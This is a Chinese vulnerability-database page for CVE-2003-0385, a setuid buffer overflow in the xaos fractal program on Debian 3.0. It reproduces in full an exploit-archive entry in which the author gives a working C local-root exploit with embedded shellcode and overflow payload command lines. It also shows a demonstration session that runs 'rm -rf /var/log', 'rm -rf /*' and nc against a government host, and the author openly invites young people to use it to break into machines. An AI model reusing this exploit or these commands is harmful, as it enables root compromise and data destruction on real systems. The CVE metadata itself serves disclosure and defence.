CVE-2003-0385
CVSS7.2
发布时间 :2003-07-02 00:00:00
修订时间 :2016-10-17 22:33:11
NMCOE    

[原文]Buffer overflow in xaos 3.0-23 and earlier, when running setuid, allows local users to gain root privileges via a long -language option.


[CNNVD]Xaos setuid权限许可和访问控制漏洞(CNNVD-200307-003)

        Xaos 3.0-23及其更早版本运行setuid时存在缓冲区溢出漏洞。本地用户可以借助一个超长-language选项获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:3.0.18::potato
cpe:/o:debian:debian_linux:3.0.23::woody

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0385
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0385
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-003
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105491469815197&w=2
(UNKNOWN)  BUGTRAQ  20030605 BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
http://www.debian.org/security/2003/dsa-310
(VENDOR_ADVISORY)  DEBIAN  DSA-310

- 漏洞信息

Xaos setuid权限许可和访问控制漏洞
高危 缓冲区溢出
2003-07-02 00:00:00 2005-10-20 00:00:00
本地  
        Xaos 3.0-23及其更早版本运行setuid时存在缓冲区溢出漏洞。本地用户可以借助一个超长-language选项获得根权限。

- 公告与补丁

        

- 漏洞信息 (22748)

Xaos 3.0 Language Option Local Buffer Overflow Vulnerability (EDBID:22748)
linux local
2003-06-06 Verified
0 bazarr@ziplip.com
N/A [点击下载]
source: http://www.securityfocus.com/bid/7838/info

It has been reported that Xaos is vulnerable to a boundary condition error in the command option processing. Because of this, an attacker may be able to gain elevated privileges, potentially compromising the integrity of the host.

/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 whoody          
    */
/*      by: bazarr                                                         
  */
/*      bazarr@ziplip.com                                                  
  */
/* 	bazarr episode #4						     * 
 										

*hendy* i dont build nests for da winter, cause i dont have no time for bui
lding nests

dis is da advisory and xploit at da same time for a local root hole in debi
an 3.0. 
if dave censor dis he out of his mind! dis my second local root xploit in a
 week!
when bugtraq be heading down south to county jail quick wid all da cross si
te scripting bugs
and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be re
al about dis
advisorys for non popular software are a dime a dozen. i da first young boy
 to come around 
wid real advisorys in many a months. so please gimmie small break. 

i release more advisorys den combined times dvdfairy has DoS'd phrack.ru

dats alot!

--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go aw
ay)

dianora when i finish "da design and implementation of da 4.4bsd operating 
system" (A BOOK)
i be back to challenge you on bsd kernel , den you have no choice but to le
t me stay and give me +v in #openbsd.
thank you. (she kicked young 16 year old boy out of channel for xposing rem
ote hole in default install!) 

ok lets take a look at the vendor info for xaos:

DESCRIPTION
       XaoS  is a protable real-time interactive fractal zoomer/morpher.  U
NIX version works under X11, SVGA and text terminals.  If you don't knwo wh
at fractal is or you want
       to know more about XaoS features you should see animated tutorial.  
 Run XaoS and press 'H' twice.  It is much more fun than reading of boring 
manual  page  :)  and  it
       supports foregin languages. You might also read  xaos.info file for 
some advanced stuff (like how to write animations and tutorials manually, p
ort or extend XaoS, algo�
       rithms used etc.)

first thing dat i spot is spelling mistake please patch 'knwo' into 'no' as
ap.

so we know dat xaos is a program which you zoom around in when you get real
 stoned(seriously). 
lets get to da local root hole in xaos. 

lets take a look at my terminal session wid xaos: 

c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc 
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos 
-rwsr-xr-x    1 root     root       379324 Apr  3  2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will resul
t in uid = 0 
c00l@debian:~/code/dump% #what will i do now?

now what i be doin is dis , bare wid me here fellow security researches (lc
amtuf you able to keep up wid dis?) 
lets keep going into dis adventure, lets check if you be vulnerable

c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable t
o 0day bug which i have discovered 
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x2049'`
^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'
`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable , what now?


after auditing for many a days and many a nights to find dis bug i am still
 weary from all of it. 
so lemme try and keep on going through dis adventure wid xaos, lets try and
 xploit it dis time. 

c00l@debian:~/code/dump% ./set #dis put shellcode in enviroment with many a
 0x90 around it 
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809
6'` -display A
Segmentation fault
[c00l:dump]$ #its not xploitable i guess 
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809
6'` -display AA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809
6'` -display AAA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809
6'` -display AAAA
sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT 
sh-2.05a# exit    
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit , thanks!

woa dis be going too fast for some security researchers let me slow down an
d xplain dis. 

xaos be doing somthing like dis wid its -language argument 

++++++++
char hoolio[4096]; //big as to not allow stack overflow

strcpy(hoolio,argv[i]) //secure
++++++++

but it is NOT secure , a attacker is able to overflow 'hoolio' wid his own 
data!
den he overwrite da saved return address on da stack with his own and den h
e execute a shell. 

-------------
ENDING 

xaos is vulnerable to a stack buffer overflow which be yeilding root privle
ges on debian 3.0 (w00dy) 

-------------	
PATCH

see many a people dont understand dis issue, i am young highschool boy 
doing many a bleeding edge freelance security work for free , it not my job
 to provide patch 
and pamper you. but if you really dont want to get hacked with many a 0day 
xploits just dont go online
and dont make fun of caddis cuz he be xploiting your ftpd in record time to
 rm you(seriously man). 

-------------	
VENDORS NOTIFYED

none

-------------	
VENDORS VULNERABLE

debain 3.0 & unstable on default install!!!
FreeBSD x.x ports! 
OpenBSD x.x ports!
NetBSD x.x ports!!! 
anyone who installed xaos!

-------------
XPLOIT 

as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz
 
i have trouble programming after last nights crystal meth ride. 

demonstation:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log 
sh-2.05a# cc b.c 
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b 
.... ..... .... .... .... ....
done. 
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos , try 1-4 'a's
woa hey i just made a fool of myself! i dident need any stack padding there
.

dis C-code is very complex , do not attempt to modify it. 

it is very user friendly though for da following groups:

1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researches to make money off highschool boy by usi
ng dis xploit on der clients and charging dem for it
4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROU
P ALL DAT MUCH) 

AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR

*/

char c[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\
x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int main(int cc,char **a) {char x[256];char b[72000];memset(b,0x99,sizeof(b
));;;memcpy(b+71968,c,strlen(c));/**/;;b[sizeof(b)]=0;;setenv("C",b,1);
if (!a[1]){printf("[*] bazarr :(\n");exit(1);};/**/;;sprintf(x,"/usr/bin/xa
os -language `perl -e 'print 
\"\x45\xfe\xfe\xbf\"x8096'` -display %s",a[1]);;;printf("[*] bazarr :)\n");
system(x);}

/* 


-------------
ADVANCE WARNING 

double free() bug in popular suid root application installed by default on 
debian 3.0 comming soon!
remote xploit for debian application comming soon!

and so many more i cannot even list dem all(SERIOUSLY). 

16 year old boy release more bugs in few weeks den your whole crew does in 
da last 5 years!
i think most of you be a little bitter about dat and dats why you some of y
ou be anti bazarr. 
your company should stick to hoolio's ftpd server. 

-------------
GREETS

sir hackalot - you cool man! you like the 2pac of hacking. what ever happen
d to you and PHAZE? it been awhile!

-------------
BYE

bye bye guys i gotta go feed the dog and work on math homework.

bye.

-bazarr


*/













		

- 漏洞信息

4528
xaos -language Option Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站